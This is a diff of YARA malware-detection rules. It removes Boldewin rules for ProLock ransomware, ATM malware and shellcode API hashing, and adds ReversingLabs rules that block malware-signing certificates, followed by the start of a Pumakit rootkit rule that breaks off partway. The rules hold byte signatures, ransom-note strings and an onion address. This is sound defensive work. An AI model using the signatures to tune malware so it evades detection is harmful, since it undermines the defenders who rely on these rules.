-		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/Prolock.Malware.yar#L1-L20"
-		license_url = "N/A"
-		logic_hash = "7502011eba1e36c8ec699f1b627c4980cc3009bb43c5aa5a58571330e93211ea"
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "0890bf55-ebd5-5b68-8047-14692a5f1ae7"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L17052-L17068"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "8e1e3e7d002ce084600c5444dc9b0bad8771370cb7919a3bb5ebc899040e4cf2"
 		score = 75
 		quality = 90
-		tags = "FILE"
-		hash1 = "a6ded68af5a6e5cc8c1adee029347ec72da3b10a439d98f79f4b15801abd7af0"
-		hash2 = "dfbd62a3d1b239601e17a5533e5cef53036647901f3fb72be76d92063e279178"
-
-	strings:
-		$DecryptionRoutine1 = {31 04 1A 81 3C 1A 90 90 90 90 74}
-		$DecryptionRoutine2 = {83 C3 04 81 3C 1A C4 C4 C4 C4 74}
-		$DecryptedString1 = "support981723721@protonmail.com" nocase ascii
-		$DecryptedString2 = "Your files have been encrypted by ProLock Ransomware" nocase ascii
-		$DecryptedString3 = "msaoyrayohnp32tcgwcanhjouetb5k54aekgnwg7dcvtgtecpumrxpqd.onion" nocase ascii
-		$CryptoCode = {B8 63 51 E1 B7 31 D2 8D BE ?? ?? ?? ?? B9 63 51 E1 B7 81 C1 B9 79 37 9E}
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		(( uint16( 0 ) == 0x5A4D ) or ( uint16( 0 ) == 0x4D42 ) ) and filesize < 100KB and all of ( $DecryptionRoutine* ) or ( 1 of ( $DecryptedString* ) and $CryptoCode )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "17:2f:ea:8c:b0:6f:fc:ed:6b:fa:c7:f2:f6:b7:77:54" and 1467936000 <= pe.signatures [ i ] . not_after )
 }
-rule R3C0NST_ATM_Malware_XFS_DIRECT : FILE
+
+rule REVERSINGLABS_Cert_Blocklist_3Ee50Bb98Fadca2D662A0920E76685A2 : INFO FILE
 {
 	meta:
-		description = "Detects ATM Malware XFS_DIRECT"
-		author = "Frank Boldewin (@r3c0nst)"
-		id = "d1551c50-d3d2-56fd-a6b7-198d3a26ac72"
-		date = "2019-10-18"
-		modified = "2019-10-19"
-		reference = "https://twitter.com/r3c0nst/status/1185237040583106560"
-		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.XFS_DIRECT.yar#L1-L37"
-		license_url = "N/A"
-		logic_hash = "844a334d0eb8516c0ef3780e48e3dbc8e23d41c80bdff10f01407b775e72709e"
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "5c35c73e-e4f6-5707-ad91-1db7c0a0ec81"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L17070-L17086"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "d232923ed962fbf4a9a30890778c2380d6c6967a693c6f77c2f558bb4347e60e"
 		score = 75
 		quality = 90
-		tags = "FILE"
-		hash1 = "3e023949fecd5d06b3dff9e86e6fcac6a9ec6c805b93118db43fb4e84fe43ee0"
-		hash2 = "303f2a19b286ca5887df2a334f22b5690dda9f092e677786e2a8879044d8ad11"
-		hash3 = "15d50938e51ee414124314095d3a27aa477f40413f83d6a2b2a2007efc5a623a"
-		hash4 = "0f9cb4dc1ac2777be30145c3271c95a027758203d0de245ec390037f7325d79d"
-		hash5 = "141ae291ddae60fd1b232f543bc9b40f3a083521cd7330c427bb8fc5cdd23966"
-		hash6 = "66eb1a8134576db05382109eec7e297149f25a021aba5171d2f99aa49c381456"
-		hash7 = "ac20b12beefb2036595780aaf7ec29203e2e09b6237d93cd26eaa811cebd6665"
-		hash8 = "901fc474f50eb62edc526593208a7eec4df694e342ffc5b895d1dcec953c6899"
-		hash9 = "56548c26741b25b15c27a0de498c5e04c69b0c9250ba35e3a578bc2f05eedd07"
-		hash10 = "c89f1d562983398ab2d6dd75e4e30cc0e95eab57cdf48c4a17619dca9ecc0748"
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
-	strings:
-		$EncLayer1 = {0F B6 51 FC 30 50 FF 0F B6 11 30 10 0F B6 51 04 30 50 01 0F B6 51 08 30 50 02}
-		$EncLayer2 = {B8 4D 5A 00 00 89 33 66 39 06 75 ?? 8b ?? 3c}
-		$String1 = "NOW ENTER MASTER KEY" ascii nocase
-		$String2 = "Closing app, than delete myself." ascii nocase
-		$String3 = "Number of phisical cash units is:" ascii nocase
-		$String4 = "COULD NOT ENABLE or DISABLE connection" ascii nocase
-		$String5 = "XFS_DIRECT" ascii nocase
-		$String6 = "Take the money you snicky mother fucker :)" ascii nocase
-		$String7 = "ATM IS TEMPORARILY OUT OF SERVICE!" wide nocase
-		$Code1 = {D1 F8 89 44 24 10 DB 44 24 10 DC 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 35 2F 81 0B 00 A3}
-		$Code2 = {8B ?? ?? ?? 68 2E 01 00 00 52 C7 ?? 06 01 00 00 00}
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ABDULKADIR SAHIN" and pe.signatures [ i ] . serial == "3e:e5:0b:b9:8f:ad:ca:2d:66:2a:09:20:e7:66:85:a2" and 1330041600 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_21Bfddb6A66435D1Adce2Ceb23Ed7C9A : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "2009c47b-8a15-50fd-a229-5e34244ede1f"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L17088-L17104"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "22ad68974a1c6729da369c26372ba93c25ddf68df880580c727bf2d3ee2d3a86"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( filesize < 1500KB and all of ( $EncLayer* ) ) or ( filesize < 300KB and 4 of ( $String* ) and all of ( $Code* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE6\\x9D\\xA8\\xE6\\xB7\\x87\\xE6\\x99\\xBA" and pe.signatures [ i ] . serial == "21:bf:dd:b6:a6:64:35:d1:ad:ce:2c:eb:23:ed:7c:9a" and 1395297334 <= pe.signatures [ i ] . not_after )
 }
-rule R3C0NST_Aplib_Decompression : FILE
+
+rule REVERSINGLABS_Cert_Blocklist_5B1C3F7Bbaa91Ca49B06A5C1004Ee5Be : INFO FILE
 {
 	meta:
-		description = "Detects aPLib decompression code often used in malware"
-		author = "@r3c0nst"
-		id = "f45c73f5-d316-5fea-a8c4-fd930733415f"
-		date = "2021-03-24"
-		modified = "2021-03-25"
-		reference = "https://ibsensoftware.com/files/aPLib-1.1.1.zip"
-		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/aPLib_decompression.yar#L1-L16"
-		license_url = "N/A"
-		logic_hash = "1150701724fdb487ebe8fb959afd12fff37a8e9137cb94e78e976a2566ec5fa4"
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "b78e7f2b-8122-5df6-ad79-393db9e0498d"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L17106-L17122"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "9a8d9acc87668a6fbd9fdd52b6ef69d18de8f19d8f3d3ca8eeb630c6e8c25c65"
 		score = 75
 		quality = 90
-		tags = "FILE"
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
-	strings:
-		$pattern1 = { FC B2 80 31 DB A4 B3 02 }
-		$pattern2 = { AC D1 E8 74 ?? 11 C9 EB }
-		$pattern3 = { 73 0A 80 FC 05 73 ?? 83 F8 7F 77 }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Jin Yuguang" and pe.signatures [ i ] . serial == "5b:1c:3f:7b:ba:a9:1c:a4:9b:06:a5:c1:00:4e:e5:be" and 1440643213 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_0A2089 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "51e603bb-ef21-55e8-8f2b-94865f1213c9"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L17124-L17140"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "07ce4d39af1e56fbbfa400cf139956826999043480f93c0fc43ed056f6420d7f"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		filesize < 10MB and all of them
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RocketMedia S.r.l." and pe.signatures [ i ] . serial == "0a:20:89" and 1050073884 <= pe.signatures [ i ] . not_after )
 }
-rule R3C0NST_ATM_Malware_Loup : FILE
+
+rule REVERSINGLABS_Cert_Blocklist_1F84E030A0Ed10D5Ffe2B81B : INFO FILE
 {
 	meta:
-		description = "Detects ATM Malware Loup"
-		author = "Frank Boldewin (@r3c0nst)"
-		id = "4786362f-b2c5-5b69-8b06-9216561286e6"
-		date = "2020-08-17"
-		modified = "2020-08-17"
-		reference = "https://twitter.com/r3c0nst/status/1295275546780327936"
-		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.Loup.yar#L1-L16"
-		license_url = "N/A"
-		hash = "6c9e9f78963ab3e7acb43826906af22571250dc025f9e7116e0201b805dc1196"
-		logic_hash = "39efced4ee3a6147acf5732e4be3a5e9859268b35b79f5e8e87d7c4d77a588c0"
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "170dae5a-ed7e-5f20-9ccd-94724e4b2084"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L17142-L17158"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "097655cb2965ae71efb905ddf20ed30c240d25e03d08a1b6c87b472533ccc9d8"
 		score = 75
 		quality = 90
-		tags = "FILE"
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
-	strings:
-		$String1 = "C:\\Users\\muham\\source\\repos\\loup\\Debug\\loup.pdb" ascii nocase
-		$String2 = "CurrencyDispenser1" ascii nocase
-		$Code = {50 68 C0 D4 01 00 8D 4D E8 51 68 2E 01 00 00 0F B7 55 08 52 E8}
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "1f:84:e0:30:a0:ed:10:d5:ff:e2:b8:1b" and 1476869735 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_88346267057C0A82E2F39851D1B9694C : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "3be920eb-7b71-53c4-94b7-0ffc88d14c59"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L17160-L17178"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "60acdbad8ad3e1d4a863ce160d93abd0b5e2b214858cba84f7a1b907d2491486"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize < 100KB and all of ( $String* ) and $Code
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Hudson LLC" and ( pe.signatures [ i ] . serial == "00:88:34:62:67:05:7c:0a:82:e2:f3:98:51:d1:b9:69:4c" or pe.signatures [ i ] . serial == "88:34:62:67:05:7c:0a:82:e2:f3:98:51:d1:b9:69:4c" ) and 1595376000 <= pe.signatures [ i ] . not_after )
 }
-rule R3C0NST_Gamaredon_Getimportbyhash : FILE
+
+rule REVERSINGLABS_Cert_Blocklist_A46F9D8784778Baa48167C48Bbc56F30 : INFO FILE
 {
 	meta:
-		description = "Detects Gamaredon APIHashing"
-		author = "Frank Boldewin (@r3c0nst)"
-		id = "8f28273e-e8ca-52cb-8dbc-a235598b1975"
-		date = "2021-05-12"
-		modified = "2021-05-12"
-		reference = "https://github.com/fboldewin/YARA-rules/"
-		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/APT.Gamaredon.GetImportByHash.yar#L1-L16"
-		license_url = "N/A"
-		logic_hash = "b3baebfb745ebc7b9e6df746bfa9622f925b8e8130932e44a148881e7d1fc162"
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "72d36a5f-6599-5456-ac67-0589e37bd035"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L17180-L17198"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "fffb6309355bc6764b0ab033db5964599c86c9a2f6d8985975a07f6b3ebb40ed"
 		score = 75
 		quality = 90
-		tags = "FILE"
-		hash1 = "2d03a301bae0e95a355acd464afc77fde88dd00232aad6c8580b365f97f67a79"
-		hash2 = "43d6e56515cca476f7279c3f276bf848da4bc13fd15fad9663b9e044970253e8"
-		hash3 = "5c09f6ebb7243994ddc466058d5dc9920a5fced5e843200b1f057bda087b8ba6"
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
-	strings:
-		$ParseImgExportDir = { 8B 50 3C 03 D0 8B 52 78 03 D0 8B 4A 1C 03 C8 }
-		$djb2Hashing = { 8B 75 08 BA 05 15 00 00 8B C2 C1 E2 05 03 D0 33 DB 8A 1E 03 D3 46 33 DB 8A 1E 85 DB 75 }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Mapping OOO" and ( pe.signatures [ i ] . serial == "00:a4:6f:9d:87:84:77:8b:aa:48:16:7c:48:bb:c5:6f:30" or pe.signatures [ i ] . serial == "a4:6f:9d:87:84:77:8b:aa:48:16:7c:48:bb:c5:6f:30" ) and 1618963200 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_525B5529Db20D17A85Be284D6B7952Ea : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "52cdf082-7212-53e6-9e55-b86153e6afe8"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L17200-L17216"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "8fd406004b634e4826659b1dff88c61074fd321969b9fd63ea45d8e9608b35f1"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Buster Ind Com Imp e Exp de Acessorios P Autos Ltda" and pe.signatures [ i ] . serial == "52:5b:55:29:db:20:d1:7a:85:be:28:4d:6b:79:52:ea" and 1508198400 <= pe.signatures [ i ] . not_after )
 }
 
-rule R3C0NST_ATM_Malware_Ploutusi : FILE
+rule REVERSINGLABS_Cert_Blocklist_70Ae0E517D2Ef6D5Eed06B56730A1A9A : INFO FILE
 {
 	meta:
-		description = "Detects Ploutus I .NET samples based on MetabaseQ report"
-		author = "Frank Boldewin (@r3c0nst)"
-		id = "02104112-6f81-5d19-935d-45cfcd2fa41c"
-		date = "2021-03-03"
-		modified = "2021-03-04"
-		reference = "https://www.metabaseq.com/recursos/ploutus-is-back-targeting-itautec-atms-in-latin-america"
-		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.Ploutus-I.yar#L3-L26"
-		license_url = "N/A"
-		logic_hash = "77100d300a40219187f5c4b8270f599a91652b69980fe450b791181b8c30b5a4"
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "98c19385-555e-5827-b03c-59645ad2a101"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L17218-L17234"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "017eed878daf706eb96b638a8d1f4428466bc1d00ce27f32628bd249a658a813"
 		score = 75
 		quality = 90
-		tags = "FILE"
-		hash1 = "4f6d4c6f97caf888a98a3097b663055b63e605f15ea8f7cc7347283a0b8424c1"
-		hash2 = "8ca29597152dc79bcf79394e1ae2635b393d844bb0eeef6709d37e6778457b31"
-		hash3 = "dce1f01c08937fb5c98964a0911de403eed2101a9d46c5eb9899755c40c3765a"
-		hash4 = "3a1d992277a862640a0835af9dff4b029cfc6c5451e9716f106efaf07702a98c"
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
-	strings:
-		$Code = {28 ?? 02 00 06 2a}
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "70:ae:0e:51:7d:2e:f6:d5:ee:d0:6b:56:73:0a:1a:9a" and 1475193600 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_57C3717C5E2Ce9A2E0Cf0340C03F458E : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "47207784-5aee-5fa3-bed9-2c12d9932c38"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L17236-L17252"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "fd710146874528c43ad8a9f847b7704c44ba4564cf79e20e6b23aa98b0ee2ea5"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		filesize < 300KB and $Code and pe.pdb_path contains "Diebold.pdb" and pe.imports ( "mscoree.dll" , "_CorExeMain" ) and ( for any i in ( 0 .. pe.number_of_resources -1 ) : ( pe.resources [ i ] . type == pe.RESOURCE_TYPE_VERSION and ( pe.version_info [ "InternalName" ] contains "Diebold.exe" ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Citizen Travel Ltd" and pe.signatures [ i ] . serial == "57:c3:71:7c:5e:2c:e9:a2:e0:cf:03:40:c0:3f:45:8e" and 1450915200 <= pe.signatures [ i ] . not_after )
 }
-rule R3C0NST_Shellcode_Apihashing_FIN8
+
+rule REVERSINGLABS_Cert_Blocklist_0761110Efe0B688C469D687512828C1F : INFO FILE
 {
 	meta:
-		description = "Detects FIN8 Shellcode APIHashing"
-		author = "Frank Boldewin (@r3c0nst)"
-		id = "a5b4a925-c4cc-5d3a-a2f1-3372f77ceea2"
-		date = "2021-03-16"
-		modified = "2021-03-25"
-		reference = "https://www.bitdefender.com/files/News/CaseStudies/study/394/Bitdefender-PR-Whitepaper-BADHATCH-creat5237-en-EN.pdf"
-		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/Shellcode.APIHashing.FIN8.yar#L1-L74"
-		license_url = "N/A"
-		logic_hash = "958d6a3c0c78ad22fb56896d6a97b9fe79c56813dc36a37385f3ce5621008624"
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "e8575a71-124b-5040-91b1-ccad371e10da"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L17254-L17270"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "0ba60e1f58c7335ba5aa261031d09ee83a0ee51e05f8f26078b2a5c776ad0add"
 		score = 75
 		quality = 90
-		tags = ""
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
-	strings:
-		$APIHashing32bit1 = {68 F2 55 03 88 68 65 19 6D 1E}
-		$APIHashing32bit2 = {68 9B 59 27 21 C1 E9 17 33 4C 24 10 68 37 5C 32 F4}
-		$APIHashing64bit = {49 BF 65 19 6D 1E F2 55 03 88 49 BE 37 5C 32 F4 9B 59 27 21}
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ENP Games Co., Ltd." and pe.signatures [ i ] . serial == "07:61:11:0e:fe:0b:68:8c:46:9d:68:75:12:82:8c:1f" and 1433721600 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_08Aa03F385F870E3A6D243B74B1Dadf6 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "64aa17fe-676d-5c6e-babc-15b5e8dc72bb"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L17272-L17288"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "ef49a28a93d31c55dd2dfd3bec645f757a0a1a7eb8718ce92cf47bf9af126aed"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		all of ( $APIHashing32bit* ) or $APIHashing64bit
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE4\\xB8\\x9C\\xE8\\x8E\\x9E\\xE5\\xB8\\x82\\xE8\\x85\\xBE\\xE4\\xBA\\x91\\xE8\\xAE\\xA1\\xE7\\xAE\\x97\\xE6\\x9C\\xBA\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "08:aa:03:f3:85:f8:70:e3:a6:d2:43:b7:4b:1d:ad:f6" and 1352678400 <= pe.signatures [ i ] . not_after )
 }
-rule R3C0NST_UNC2891_Steelcorgi : FILE
+rule REVERSINGLABS_Linux_Rootkit_Pumakit : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Detects UNC2891 Steelcorgi packed ELF binaries"
-		author = "Frank Boldewin (@r3c0nst)"
-		id = "94da7da5-5fc3-5221-97d6-1854aa7b1959"
-		date = "2022-03-30"
-		modified = "2023-01-05"
-		reference = "https://github.com/fboldewin/YARA-rules/"
-		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/UNC2891_Steelcorgi.yar#L1-L17"
-		license_url = "N/A"
-		logic_hash = "4f956b9eaec66bc606ffd0afa2fe9303194e9a8c12d4c3de6ab2334c9856dd99"
+		description = "Yara rule that detects Pumakit rootkit."
+		author = "ReversingLabs"
+		id = "c5c41245-6252-569a-992f-e27a5a3b67f0"
+		date = "2025-08-26"
+		modified = "2025-08-26"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/rootkit/Linux.Rootkit.Pumakit.yara#L1-L161"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "437ed7db3f71106b3e30f11ccbd43e66b7b79fc92dc5372d9497a4d2c328b55c"
 		score = 75
 		quality = 90
-		tags = "FILE"
-		hash1 = "0760cd30d18517e87bf9fd8555513423db1cd80730b47f57167219ddbf91f170"
-		hash2 = "3560ed07aac67f73ef910d0b928db3c0bb5f106b5daee054666638b6575a89c5"
-		hash3 = "5b4bb50055b31dbd897172583c7046dd27cd03e1e3d84f7a23837e8df7943547"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "MALWARE"
+		tc_detection_type = "Rootkit"
+		tc_detection_name = "Pumakit"
+		tc_detection_factor = 4
+		importance = 25
 
 	strings:
-		$pattern1 = {70 61 64 00 6C 63 6B 00}
-		$pattern2 = {FF 72 FF 6F FF 63 FF 2F FF 73 FF 65 FF 6C FF 66 FF 2F FF 65 FF 78 FF 65}
+		$hooking_syscalls_mechanism_p1 = {
+            E8 ?? ?? ?? ?? 55 48 C7 C7 ?? ?? ?? ?? 48 89 E5 41 57 41 56 41 55 41 54 53 51 E8 ??
+            ?? ?? ?? 48 C7 C7 ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 C7 C7 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 31 D2 48 89 05 ?? ?? ?? ?? 48 8B BA ?? ?? ?? ?? 48 85 FF 75 ?? 48
+            8B 8A ?? ?? ?? ?? 48 85 C9 74 ?? B8 ?? ?? ?? ?? 80 7C 01 ?? ?? 75 ?? 48 63 74 01 ??
